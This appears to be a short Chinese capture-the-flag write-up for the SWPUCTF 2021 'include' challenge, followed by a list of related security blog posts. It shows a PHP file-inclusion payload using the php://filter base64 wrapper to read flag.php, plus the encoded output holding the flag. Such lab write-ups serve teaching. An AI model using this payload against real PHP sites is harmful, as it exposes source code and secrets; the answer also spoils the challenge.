[SWPUCTF 2021 新生赛]include

传入一个file试试,尝试/?file=3

提示flag 在flag.php中,但是无法直接读出flag.php - 原因是由于flag.php中不具有echo相对应的输出语句,应该是仅具有$flag变量的定义。因此,采用php伪协议进行输出

?file=php://filter/convert.base64-encode/resource=flag.php

得到PD9waHANCiRmbGFnPSdOU1NDVEZ7Njk4MGY2OTctNzE0OC00M2FlLWFjZmUtNjk2OWZjMzdkNTgwfSc7

进行base64解密即可

相关推荐
NewCarRen10 小时前
自动驾驶安全评估框架:基于物理的功能能力测试
网络安全·自动驾驶·汽车
JM丫11 小时前
内网理论知识总结
笔记·网络安全
麦烤楽鸡翅11 小时前
坚持60s (攻防世界)
java·网络安全·jar·ctf·misc·反编译·攻防世界
武汉唯众智创17 小时前
网络安全教学升级!基于深度强化学习的动态对抗网络安全防护教学方案全解析
网络·人工智能·安全·web安全·生成对抗网络·网络安全
NewCarRen18 小时前
汽车蓝牙信息娱乐系统隐私风险:攻击分析与防御策略
网络安全·汽车
NewCarRen19 小时前
智能电动汽车网络安全与功能安全融合框架构建及验证
网络安全·汽车·汽车网络安全
WayneJoon.H21 小时前
Java反序列化 CC6链分析
java·安全·网络安全·cc链·反序列化
汤愈韬1 天前
MSTP工作原理、MSTP配置案例、MSTP负载均衡
网络·网络安全
麦烤楽鸡翅2 天前
give_you_flag(攻防世界)
网络安全·信息安全·ctf·misc·杂项·攻防世界·二维码处理
云安全联盟大中华区2 天前
构建AI原生工程组织:关于速度、文化与安全的经验
人工智能·安全·web安全·网络安全·ai·ai-native